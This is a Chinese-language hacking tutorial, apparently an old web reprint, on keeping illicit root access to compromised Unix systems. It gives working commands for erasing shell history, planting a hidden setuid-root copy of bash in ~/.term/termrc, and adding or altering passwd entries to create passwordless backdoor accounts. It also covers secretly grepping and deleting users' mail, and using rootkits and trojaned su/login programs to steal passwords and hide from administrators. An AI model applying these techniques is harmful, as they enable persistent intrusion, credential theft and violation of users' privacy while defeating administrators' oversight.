一些訣竅
Root和Demon的工具包及特洛伊木馬
--------------------------------------------------------------------------------
保持訪問權限的方法有很多。雖然在你學習本文時，可能正將要失去在某些主機上
的訪問權限，但我希望本文中的一些經(jīng)驗可以使你成為一名“堅固”的黑客。
一些訣竅
這里提供的一些“訣竅”可以幫助你保持在主機上的權限。一旦系統(tǒng)管理員發(fā)現(xiàn)了
你，他們會在一旁監(jiān)視你和你在該系統(tǒng)上所做的每一件事，他們還會重新編譯二進制文件
、更改每個用戶的密碼、拒絕來自你所在主機的訪問、隱藏passwd和shadow檔、檢查有
SUID的文件，等等......
如果你發(fā)現(xiàn)自己已經(jīng)暴露了，不要試圖再次闖入該系統(tǒng)。我就曾經(jīng)目睹了一些人因為
試圖通過安裝特洛伊木馬、使用其他帳號或以前所設置的“后門”再次獲取權限而被捕。
仔細想一下，他們在監(jiān)視你......你在系統(tǒng)中的一舉一動、精心設計的程序都會他們知道！
千萬不要這樣！請等待！當一個月后，他們會以為事情已經(jīng)過去而放松警惕。這時，
你就可以利用他們遺漏的系統(tǒng)漏洞之一再次進入該系統(tǒng)，并嘗試恢復你以前所做的工作。
OK。以下就是這些“訣竅”。
歷史文件：
--------------
總是把你的.bash_history文件鏈接到/dev/null。否則，至少要編輯它。記住，.bash_history
會記錄你在退出登錄前所輸入的命令。舉個例子，如果你編輯它，它就會記錄到你正在
編輯它。你或許可以在另外的shell中編輯它，但這似乎有點多余，只要把它輸出到/dev/null
就行了。
1. 如果在用戶目錄下有.bash_history文件，刪除它。
2. 在用戶根目錄下輸入命令：ln -s /dev/null .bash_history
“藏身”目錄：
-----------------
總是在系統(tǒng)找一個目錄作為你的文件的“藏身之所”。這里提供幾個大多數(shù)用戶幾乎
從來沒有瀏覽過的目錄。
在用戶根目錄中尋找.term，在該目錄下只有一個termrc可執(zhí)行文件。系統(tǒng)管理員及其同類
用戶都已慣于看到這個隱藏目錄，但幾乎從未進入此目錄。如果你們進入了這個目錄，你想
他們對此目錄下的termrc可執(zhí)行文件有何感想呢？對了。沒有。。。因為他們認為這個文件
正在它應該在的地方。
好了。讓我們把termrc變大一點，并加上suid權限。。。你明白其中的意思吧？？？我
想你能猜得到。;-) 然后切換到/bin目錄并輸入：
cp bash（或sh等之類的shell） ~username/.term/termrc
chown root ~username/.term/termrc
chgrp root~username/.term/termrc
chmod s ~username/.term/termrc
現(xiàn)在，你有一個可以隨時成為root用戶的文件，而且不易被系統(tǒng)管理員發(fā)現(xiàn)。如果你希望
做得更好一點，可以修改文件日期，使其看起來是一個“舊”文件。
另外，還有一些是每個用戶必有但卻可能從未使用過的目錄，如 .elm 、.term 、mail。你還
可以嘗試建立“...”目錄，由于它緊跟在兩個特殊目錄“.”和“..”之后，不易被察覺，因此
是簡單可行的。當用ls -al察看時，顯示如下內(nèi)容：
1024 Jan 29 21:03 .
1024 Dec 28 00:12 ..
1024 Jan 29 21:03 ...
509 Mar 02 1996 .bash_history
22 Feb 20 1996 .forward
164 May 18 1996 .kermrc
34 Jun 06 1993 .less
114 Nov 23 1993 .lessrc
1024 May 18 1996 .term
1024 May 19 1996 public_html
看見它所處的位置了嗎？
但如果使用 ls -l命令，只會顯示如下內(nèi)容：
1024 May 19 1996 public_html
記住，你也可以尋找一些具有很長名字的文件路徑，而且一般沒有人想進入它。
利用它來作為你的“藏身”目錄，當然，你甚至可以在那里建立“..,”目錄。;-)
制作新命令
--------------------
在你檢查cron是否已經(jīng)使用MD5加密后，你或許希望將所設計的程序復制到另一
個不同的文件以保存在系統(tǒng)中；以或者是覆蓋一個你知道從未有人使用過的命令。
復制文件時應注意修改文件日期，不然遲早系統(tǒng)管理員都將修復系統(tǒng)，使你所設計的
程序都是白費心機。
更好的方法是為所要使用的shell取另外的新名字，并使它具有suid權限。
增加或修改登錄密碼
---------------------------------
另一個可行的“后門”是在passwd檔中增加新用戶，并盡量使它看起來象是原來
就有的。盡量不要使用這個新用戶密碼，不要用它登錄，只是在你失去了原有權限時
才將它派上用場。
特點：這個用戶不必是容易引起注意的root用戶；你可以在任何需要的時候成為
root用戶。以下是一個實例：
We want to make our account look like it belongs, so lets keep to thetop of
the file.
root:fVi3YqWnkd4rY:0:0:root:/root:/bin/bash
sysop:mZjb4XjnJT1Ys:582:200:System Operator:/home/sysop:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:65535:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
以上這些已足夠我們使用了，因此我只列出這些用戶。
1. 查看用戶operator、ftp和postmaster，所有這些帳號都可以執(zhí)行shell，而且沒有設
置密碼。在你的shell中輸入：
passwd postmaster
回車（entern）以設置其密碼為空。這樣，你就能在任何時候用這個帳號登錄，
同時也不會引起引起系統(tǒng)管理員的懷疑。
2. 在passwd檔中加入下面一行：
syst::13:12:system:/var/spool:/bin/bash
將該行放入文件內(nèi)部（不會引起注意）。在密碼部分::可以不進行設置，或者在
root shell中鍵入passwd syst以輸入新密碼。組和用戶id可以隨意設置。
3. 查看sync用戶一行：
sync:*:5:0:sync:/sbin:/bin/sync
將其修改為：
sync:*:5:0:sync:/sbin:/bin/bash
然后運行
將密碼設置為空（或其他）。在這個賬號中gid=0。;-)
安裝游戲
----------------
如果系統(tǒng)中裝中游戲，你也可以安裝一些可以利用的游戲，如doom、abuse。在附錄
中有可以利用這些游戲取得root權限的程序。
保持監(jiān)視
------------------
總是要知道系統(tǒng)中的管理員是誰。如何如何發(fā)現(xiàn)他們呢？可以查看passwd檔中的
用戶根目錄、用戶id、用戶組或者閱讀bash_history文件查看使用管理員命令的用戶。
你還可以從這些歷史文件中學到新的命令，不過，主要還是要知道誰在這個系統(tǒng)里。
一定要很熟悉你正在使用的系統(tǒng)；用su : 查找用戶；瀏覽log文件以查看誰在使用管理
員命令。
對系統(tǒng)保持監(jiān)視。當你在系統(tǒng)中時，要注意別人。查看管理員命令歷史記錄，看看
他們在使用什么命令：tty端口監(jiān)聽？過多的ps命令？在ps或w或who命令后跟著finger
命令說明他們正在監(jiān)視系統(tǒng)中其他用戶。監(jiān)視系統(tǒng)管理員，并要留意他們對系統(tǒng)中用戶
有多少了解。
閱讀系統(tǒng)郵件
首先要記?。簭牟皇褂孟到y(tǒng)郵件程序。否則用戶會知道你閱讀了他們的郵件。我使用
了一些方法來閱讀郵件。現(xiàn)在讓我們來看一看：
1. cd /var/spool/mail
在此目錄中保存著所有未閱讀郵件和等待中的郵件。我們可以按照以下步驟閱讀
郵件：
grep -i security * |more
grep -i hack * |more
grep -i intruder * |more
grep -i passwd * |more
grep -i password * |more
譬如你想查看pico用戶名，可以鍵入ctrl w來進行搜索。如果你看見有其他系統(tǒng)
管理員有郵件告訴系統(tǒng)管理員你正在使用某用戶名從他們的服務器上攻擊該系統(tǒng)，
你當然可以刪除它了。
有一個郵件閱讀器，它允許你閱讀郵件，但并不更新郵件標識（是否已讀）：
http://obsidian.cse.fau.edu/~fc
在那里有一個工具可以在不改變最后閱讀日期的情況下顯示/var/spool/mail中的郵件。
也就是說，他們（用戶）根本不知道你已閱讀過他們的郵件。
另外要記住，你可以在用戶的目錄下發(fā)現(xiàn)其他系統(tǒng)郵件。一定要檢查/root目錄。
檢查/root/mail或username/mail或其它包含了以前郵件的目錄。
祝你“狩獵”快樂。。。
--------------------------------------------------------------------------------
Root和Demon工具及特洛伊木馬
Root工具是ps、login、netstat的c源程序，有時還有一些已經(jīng)被“黑”過的程序以
供你使用。有了這些工具，就可以更換目標主機上的login文件，從而使你能夠不用帳號
就可以在目標主機上登錄。
你還可以修改ps，使你在系統(tǒng)管理員使用ps命令時不會暴露，還可以隱藏一些有
明顯含義的可執(zhí)行文件（如“sniff”開始的文件）在運行時的進程。
Demon工具提供了identd、login、demon、ping、su、telnet和socket的黑客程序。
特洛伊木馬是那些可以讓你在某些方面欺騙系統(tǒng)的程序。一個放在系統(tǒng)管理員目
錄下的su木馬程序，只要你改變了他的查找路徑，su木馬程序就能在真正的su程序前首
先運行。在向其提示輸入錯誤密碼，同時刪除木馬程序并保存其密碼到/tmp目錄下。
一個login木馬程序可以將主機上所有的登錄密碼保存在一個文件中。我想你知道
其中的含義了吧。;-)
Demon和Linux root工具的源程序可在附錄VI中找到。

最新評論